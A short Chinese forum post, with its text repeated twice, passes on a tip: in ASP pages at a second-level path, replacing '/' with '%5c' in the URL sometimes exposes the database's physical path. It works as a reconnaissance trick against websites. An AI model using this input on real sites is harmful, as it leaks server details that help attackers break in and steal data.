网上看到的,对于提交查询位于2级路径的asp有效,不过经过测试不是100%成功。比如:
http://[url=http://www.xxx.com/]www.xxx.com/bbs/news.asp?id=1换成
http://[url=http://www.xxx.com/]www.xxx.com/bbs%5cnews.asp?id=1
即把“/”换成“%5c”提交
成功的话数据库的物理路径就暴露出来了,不知是为何
网上看到的,对于提交查询位于2级路径的asp有效,不过经过测试不是100%成功。比如:
http://[url=http://www.xxx.com/]www.xxx.com/bbs/news.asp?id=1换成
http://[url=http://www.xxx.com/]www.xxx.com/bbs%5cnews.asp?id=1
即把“/”换成“%5c”提交
成功的话数据库的物理路径就暴露出来了,不知是为何